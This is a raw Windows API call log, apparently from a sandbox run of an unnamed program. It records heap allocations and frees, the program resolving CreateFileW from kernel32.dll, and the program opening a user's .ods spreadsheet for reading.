[0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0079.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0079.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0079.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0079.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.502] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a40c8 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.507] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.510] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0079.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0079.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cab68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.510] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0079.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0079.511] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\iwvsvvmxlofdd1.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e310 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 